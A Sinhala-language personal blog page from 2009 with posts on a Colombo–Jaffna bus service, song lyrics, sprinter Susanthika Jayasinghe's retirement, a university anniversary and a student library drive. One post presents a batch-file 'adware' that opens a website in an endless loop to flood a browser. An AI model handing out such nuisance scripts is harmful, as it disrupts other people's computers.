    • Dreamweaver Tutorials
    • Flash Tutorials
    • Macromedia Fireworks
    • Basic HTML Tutorial
    • WS_ftp Tutorial
    • Cute ftp Tutorial
    • How to Copy and Paste
    • How to Unzip a .Zip File
  • Link Popularity Check
  • ASCII Codes
  • RGB Hex Color Chart
  • Submit Your Site
  • Picture Tubes
  • Flash Navigation Menu
  • URL Encode Generator
  • Website Templates
  • Article Library
  • Software
    • PDF Creator
    • HTML Protector
    • Restore Files / File Saver
    • Messenger Patch
    • DVD Unlocker
    • Backup Email
  • HTML Tags
  • Website Promotion
  • Position Analyzer
  • Make money
  • Server Side Includes
  • Free Javascripts
  • HTML Codes
  • Cascading Stylesheets
  • Meta Tag Analyzer
  • Free Resources
මෙතනින් යන්න ::

කොළඹ සිට යාපනයට....


"A9 මාර්ගය විවෟත කල වහාම කොළඹ සිට යාපනයට ලංගම බස් සේවාවන් අරඹන බව ප්‍රවාහන අමාත්‍ය ඩලස් අලහප්පෙරැම මහතා කියා සිටිනවා. තවද, දැනටමත් මේ සදහා බස්රථ 25 ක් වෙන්කර ඇතිබව එතුමා වැඩිදුරටත් ප්‍රකාෂ කර තිබෙනවා.
කොළඹ සිට යාපනය, මහනුවර සිට යාපනය, වව්නියාව සිට යාපනය දක්වා මෙම බස්රථ සේවා පුලුල් කරන බවද, දැනට විනාශ වී ඇති මුලතිව් හා කිලිනොච්චි ඩිපෝ සදහා බස්රථ 50 බැගින් දී ඒවායේද ප්‍රවාහන පහසුකම් දියුණු කරනබව එතුමා ප්‍රකාෂ කර තිබෙනවා."
කෙසේ හෝ නුදුරැ අනාගතයේදී අපට A9 මාර්ගය ඔස්සේ යාපනයට ගමන් කිරීම කොළඹ සිට මහනුවර දක්වා ගමන් කරන්නාසේ නිදහසේ ගමන්කිරීමට හැකිවනු ඇත්නම් එය අපට මහත් වූ සතුටක් මෙන්ම ආඩම්බරයකද වනු නොඅනුමානය .

Friday, February 6, 2009

Adware එකක් හදමු..

මගේ කලින් ලිපියෙන් මම පරිගණකය shutdown කරන වෛරසයක් නිර්මාණය කරන ආකාරය ඉදිරිපත්කලා. ඉතින් මම මේ ලිපියෙන් බලාපොරොත්තු වන්නේ Adware එකක් නිර්මාණය කරන ආකාරය ඉදිරිපත්කරන්නයි.ඊට කලින් Adware කියන්නෙ මොනවද කියල කියන්නම්.

  • ඇත්තටම Adware එකක් කියන්නෙ කූට වෙළද උපක්‍රමයක් කීවොත් මං නිවැරදියි. මක්නිසාදයත් Adware එකක් යොදාගන්නේ තමන්ගේ website එක ප්‍රසිද්ද කරගැනීමේ අරමුණෙන් බැවිනි. Adware එකකින් කරනුයේ අපව දැනුවත්ව හෝ නොදැනුවත්ව අදාල website එකට සම්බන්ද කිරීමයි..
දැන් අපි බලමු Adware එකක් හදන්නෙ කොහොමද කියලා.

සැ::යු::

නමුත් මේවා හදපු පලියටම මෙම වෛරස අයුතු ලෙස ප්‍රයෝජනයට ගන්න එපා කියල මම ඔයාලගෙන් ඉල්ලා සිටිනවා. ඒ වගේම මෙම වෛරස පරීක්ෂා කිරීමේදී ආරක්ෂාවන ලෙසත්, එමගින් ඔබගේ පරිගණකයේ දෝෂ ඇතිවිය හැකි බවත් සලකන්න.

Adware නිර්මාණය ::

1 පියවර :: notepad එක open කරගන්න.

2 පියවර :: එහි පහත දැක්වෙන දෑ type කරන්න.

@echo off

:loop

start www.mywebsite.com

goto loop

www.mywebsite.com වෙනුවටද ඔබට කැමති website එකක් දමන්න.

3 පියවර :: ඉන්පසු මෙය name.bat ලෙස save කරන්න.

( Name වෙනුවටද ඔබට කැමති නමක් type කලහැක. නමුත් .bat අනිවාර්යයි.)

3 පියවර :: දැන් අපේ Adware එක නිර්මාණය කර අවසානයි...


චන්ද්‍රයන් පිදූ ...........



සිහිනෙන් වුවත් නෑ මා දුටුවේ
මාගේ දිවියේ අන්ධකාරේ
ඔබගෙන් පෙර නෑ මා.. කිසිදා හිරැ අග බැලුවේ
නෑ මා කිසිදා හිරැ අග බැලුවේ
පැතුමන් අදුරේ සිරවූයේ
ඔබගේ සෙනෙහෙන් ආදරයේ අර්ථය ලැබුවේ
කදුලැල් දියදහරා නෙතගින් නොකැඩී ගලා ගියේ
මා....... තනිවී
සිසිරෙන් මුවාවූ වසන්තේ උදා වූ ලෙසේ...

චන්ද්‍රයන් පිදූ කිරණක් සගවාලා හොරෙන්
වර්ණවත් කලේ මාගේ සිහිනේ ඔබේ නමින්
වැගුරෑ ඒ කදුලැල් බිදු වියැකී සෙමින්
ඔබ ගෙන ආ සෙනෙහස මුදු පවනේ රැදි සිසිලක් ලෙසින්
සිසිලක් ලෙසින් ඔබ මා හද පුබුදු කලේ...

වසන්තයයි මාගේ දෙතොලේ
සිහිවන්නේ ඔබෙ මුව හමුවේ
කැළඹිලා සැමදා ඔබගේ කැලුමන් අතරේ
අප නෙත් ගැටෙනා මොහොතේ ඔබ මා සතුවයි රහසේ
හැගේ සිතේ නිසංසලේ
රගදෙයි ඔබ දෙසෙනා වග නම් යහනේ තනිවී....

චන්ද්‍රයන් පිදූ කිරණක්..........


ගායනය :: ඩැඩී..
සිංදුව බාගන්න :: http://www.ananmanan.com/emusic/get_lyric.php?lid=1208

සුසන්තිකා ක්‍රීඞා දිවියෙන් සමුගනී..


කෙටි ධාවන ශූරී සුසන්තිකා ජයසිංහ ඊයේ(05 පෙබ 2009) සිය ක්‍රීඞා දිවියෙන් සමුගත්තා. ඇය උතුම් වූ මව් පදවිය ලැබීමට තීරණය කිරීමත් සමග සිය ක්‍රීඞා දිවියට සමුදුන් බව ඇය පවසා සිටියා.

1975 දෙසැම්බර් 17 දින ඇත්තාවල නම් ග්‍රාමයේ උපත ලද ඇය, 1994 සිට මේ දක්වා සිය දක්ෂතාවයෙන් ශ්‍රී ලංකාවට ඉමහත් කීර්තියක් අත්කර දුන්නා.. 2000 වසරේ සිඞ්නි ඔලිම්පික් උළෙලේදී ඇය විසින් ශ්‍රී ලංකාවට හිමිකර දුන් ලෝකඞ පදක්කම, වසර 52 කට පසු ශ්‍රී ලංකාවට හිමිවූ එකම ඔලිම්පික් පදක්කම විය...

1994 සිට විවිධ අයුරින් තම නාමය ඉතිහාස පොතට එකතු කල ඇය ජනාධිපතිතුමා හමුවී සමුගනිද්දී ඔහු ඇයට සමරැ තිළිණයක් සමග මුදලින් මිලියන 50ක ත්‍යාගයක්ද පිරිනැමුවා.

එදා මෙදා තුර සුසන්තිකා ජාත්‍යන්තර තරගබිමේ ලබාගත් ජයග්‍රහන මෙසේය::

  • ආසියානු තරගාවලිය - ජපානය හිරෝෂිමා නගරය - දෙවන ස්ථානය - 200m(1994)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ග්‍රීසියේ ඇතැන්ස් නුවර - දෙවන ස්ථානය - 200m(1997)
  • ඔලිම්පික් තරගාවලිය - ඕස්ට්‍රේලියාවේ සිඞ්නි නුවර - දෙවන ස්ථානය - 200m(2000)
  • ගෘහස්ත ලෝක ශූරතා තරගාවලිය - පෘතුගාලය ලිස්බන් - සිව්වන ස්ථානය - 200m(2001)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ස්පාඤ්ඤය මැඞ්රිඞ් නුවර - තෙවන ස්ථානය - 100m(2002)
  • ආසියානු තරගාවලිය - ශ්‍රී ලංකාව කොළඹ - ප්‍රථම ස්ථානය - 100m(2002)
  • පොදුරාජ්‍ය තරගාවලිය - බ්‍රිකාන්‍ය මැන්චෙස්ටර් නුවර - සිව්වන ස්ථානය - 100m(2002)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ස්පාඤ්ඤය මැඞ්රිඞ් නුවර - සිව්වන ස්ථානය - 200m(2002)
  • ආසියානු තරගාවලිය - ශ්‍රී ලංකාව කොළඹ - ප්‍රථම ස්ථානය - 200m(2002)
  • ආසියානු තරගාවලිය - දෝහා කටාර් - දෙවන ස්ථානය - 100m(2006)
  • ආසියානු තරගාවලිය - දෝහා කටාර් - තෙවන ස්ථානය - 200m(2006)
  • ආසියානු තරගාවලිය - ඡෝර්දාන් අම්මාන් නුවර - ප්‍රථම ස්ථානය - 100m(2007)
  • ආසියානු තරගාවලිය - ඡෝර්දාන් අම්මාන් නුවර - ප්‍රථම ස්ථානය - 200m(2007)
  • අයි.ඒ.ඒ.එෆ් ලෝක ශූරතා තරගාවලිය - ජපානය ඔසාකා නුවර - තෙවන ස්ථානය - 200m(2006)

Thursday, February 5, 2009

ස්වර්ණ ජයන්තිය 1959 - 2009


ශ්‍රී ජයවර්ධනපුර විශ්වවිද්‍යාලයේ 50 වන සංවත්සරය සැමරීමට මේ දිනවල සියල්ල සූදානම්..

1959 දී එවකට අග්‍රාමාත්‍යව සිටි SWRD බණ්ඞාරණායක මැතිදුන් විසින් ආරම්භ කරන ලද ශ්‍රී ජයවර්ධනපුර විශ්වවිද්‍යාලය මේ වනවිට දිගු ඉතිහාසයකට උරැමකම් කියයි..

මෙම ඓතිහාසික අවස්ථාව සමරනුවස් සිදුකරන විෂේෂ උත්සවමාලාවේ වැදගත් අවස්ථා මෙසේයි::

  • 2-3 ජන, 2009 - පිරිත් දේශනය සහ දානමය පිංකම..
  • 6 සිට 12 ජන, 2009 - "වෙදැස" වෛද්‍ය ප්‍රදර්ශනය BMICH හිදී..
  • 18 පෙබ, 2009 - පනස්වස් සැමරැම් උත්සවය..
  • 18 පෙබ, 2009 - පනස්වස් සැමරැම් මුද්දරය නිකුත් කිරීම..
  • 19 සිට 21 පෙබ, 2009 - විදුජය තුන්කල් දැක්ම:: කලා,වාණිජ,විද්‍යා ප්‍රදර්ශනය විශ්වවිද්‍යාල පරිශයේදී...
  • 27 මාර්තු, 2009 - සංස්කෘතික උළෙල..
  • 10-12 දෙසැ, 2009 - ශ්‍රාස්ත්‍රීය සම්මන්ත්‍රණය, තේමාව:: බුදුදහම, විද්‍යාව සහ සංවර්ධනය..

සහෘද යාත්‍රා - 2009


ශ්‍රී ලංකාවේ ඈත දුර බැහැර ප්‍රදේශවල පොල්අතු සෙවිලි කල මඞුවල ඉතාමත් ආර්ථික දුෂ්කරතාමත ඉගෙනගන්නා අහිංසක ළමයි මේ රටේ ඉන්නවා. ඔවුන්ට නවීන තාක්ෂණයක් කියා දෙයක් පෙනෙන මානයකවත් නැති තරම්.. ඉටිපන්දම් එළියෙන් අකුරැ කරන ඔවුන්ගේ ධෛර්යය අහස තරම්..

එවන් වූ අහිංසක සිත් වලට රැකුලක් වන්නට ශ්‍රී ජයවර්ධනපුර විශ්වවිද්‍යාලයේ ව්‍යවහාරික විද්‍යාපීඨයේ සිසුන් සූදානම්..

"සහෘද යාත්‍රා - 2009" නිර්මානය වූයේ ඒ අනුවය.. මෙවර හම්බන්තොට දිස්ත්‍රික්කයේ දුෂ්කර පාසලක් වන තිස්සමහාරාම මැදවලාන මහා විද්‍යාලයේ සිසුන්ට අත්වැලක් වන්නයි අපේ මේ සූදානම..

කිසිම පහසුකමක් නොමැතිව අකුරැ කරනා මෙම කුඞා පාසලේ මේ වනවිට ළමුන් 500 ක් පමණ අධ්‍යාපනය ලබනවා..ප්‍රාථමිකයේ සිට උසස් පෙළ කලා දක්වා පන්ති තිබුනද ඔවුන්ට හරිහමන් පුස්ථකාලයක්වත් නැහැ..
එබැවින් අපේ මේ වෑයම ඔවුන්ට පුස්ථකාලයක් තනාදී ඔවුන්ගේ විෂයන්ට අදාල පොත්ද පරිත්‍යාග කරීමටයි..

අපගේ මේ වෑයම පිපෙන්නට වෙරදරන කැකුඑ වලට අත්වැලක් වීමයි.. ඔබත් මේ සදහා දායකවන්නේ නම්;

වැඞි විස්තර::
http://www.sahurdayathra.tk

විමසන්න::
071- 8 227 332- (රැවන්)
071-209 77 33 - (තරිදු)